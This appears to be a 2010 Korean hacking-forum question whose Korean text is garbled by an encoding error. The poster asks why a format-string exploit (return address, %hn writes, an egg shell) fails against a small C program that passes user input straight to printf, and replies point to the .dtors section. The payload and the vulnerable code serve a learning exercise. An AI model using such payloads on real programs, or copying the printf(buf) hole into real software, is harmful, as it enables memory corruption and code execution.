½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   bluesun2
   Æ÷¸Ë ½ºÆ®¸µ ¸®ÅϾîµå·¹½º°ª Áú¹® ¤Ð¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1449 [º¹»ç]


./egg ½© ½ÇÇàÈÄ

0xbff7fa28

edb bugfile

b main

r

x/12 $ebp


0xbfe7a8e8 À̶ó´Â °ªÀ» »Ì¾Æ³»¾ú½À´Ï´Ù

¿©±â¼­ + 4¸¦ÇÏ¿©
0xbfe7a8ec °¡ ³ª¿À´Âµ¥ ÀÌ°Ô ¸®ÅÏ°ªÀΰ¡¿ä?

Æ÷¸Ë½ºÆ®¸µ °ø°ÝÄÚµå Â¥¸é \x41\x41\x41\x41\xec\xa8\xe7\xbf\x41\x41\x41\x41\xee\xa8\xe7\xbf%%64024d%%hn%%50639d%%hn";cat) | ./bugfile À̶ó°í ¸í·É¾î ÀÔ·ÂÇصµ ¾ÈµÇ³×¿ä Á¦°¡ À߸øÇÑ°Ô ¹»±î¿ä?



bugfile ÄÚµùÀÔ´Ï´Ù

#include <stdio.h>
main() {
int i=0;
char buf[ 64];
memset (buf, 0, 64);
read(0, buf, 64);
printf(buf);
}
  Hit : 3812     Date : 2010/12/08 11:43


    
helloman objdump -h bugfile | grep .dtors Çؼ­ ³ª¿Â ÁÖ¼Ò°ªÀÌ ¹ºÁö ºÐ¼®Çغ¸¼¼¿ä...

 2010/12/30  
helloman À̰͵µ Çѹø º¸¼¼¿ä ¼³¸í ÀßµÇÀֳ׿ä

<a href=http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&keyword=objdump&select_arrange=headnum&desc=asc&no=162 target=_blank>http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&keyword=objdump&select_arrange=headnum&desc=asc&no=162</a>		 2010/12/30